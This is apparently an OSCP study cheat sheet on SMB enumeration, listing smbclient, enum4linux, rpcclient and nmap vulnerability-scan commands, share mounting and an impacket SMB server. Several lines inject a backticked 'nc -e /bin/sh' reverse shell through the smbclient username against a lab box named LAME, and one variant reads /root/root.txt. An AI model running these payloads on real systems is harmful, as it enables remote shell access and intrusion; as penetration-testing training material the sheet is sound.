OSCP
SMB Enumeration

SMB Tools

```bash
smbclient -L x.x.x.x
smbmount //x.x.x.x/share /mnt -o username=hodor,workgroup=hodor
smbclient \\\\x.x.x.x\\share
enum4linux -a ip
rpcclient -U "" x.x.x.x # Anonymous bind using rpcclient / null connect
smbclient //MOUNT/share # Connect to SMB share

smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I ip //LAME/tmp

nmap -T4 -sS -sC -Pn -A --script "smb-vuln*" ip
smbclient //ip/tmp
# The next line is entered at the smbclient prompt, not in the shell
logon "./=`nohup nc -e /bin/sh LHOST LPORT`"

smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I ip //LAME/tmp

smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I ip //LAME/tmp

smbclient -L ip
enum4linux -S ip
```

Nmap SMB Script Scan

```bash
# SMB users and share scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse ip

# SMB vulnerability scan
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse ip
# smb-check-vulns.nse ships only with older Nmap releases; newer ones use the smb-vuln-* scripts above.
# unsafe=1 enables checks that can crash an unpatched target.
nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 ip
nmap --script=smb-check-vulns.nse x.x.x.x
```

Mounting File Share

```bash
# NFS export
mount ip:/vol/share /mnt/nfs -o nolock
# SMB/CIFS shares
mount -t cifs -o username=user,password=pass,domain=blah //ip.X/share-name /mnt/cifs
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
# List the NFS exports offered by a server
showmount -e IPADDR
```

Mounting Share folder

```bash
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
```

Create a SMB Server

```
# On Kali: host an SMB server that shares the current directory
impacket-smbserver ShareFolder "$(pwd)"

# On Windows (PowerShell): map the share as a drive
New-PSDrive -Name "Followme" -PSProvider "FileSystem" -Root "\\ip\ShareFolder"
```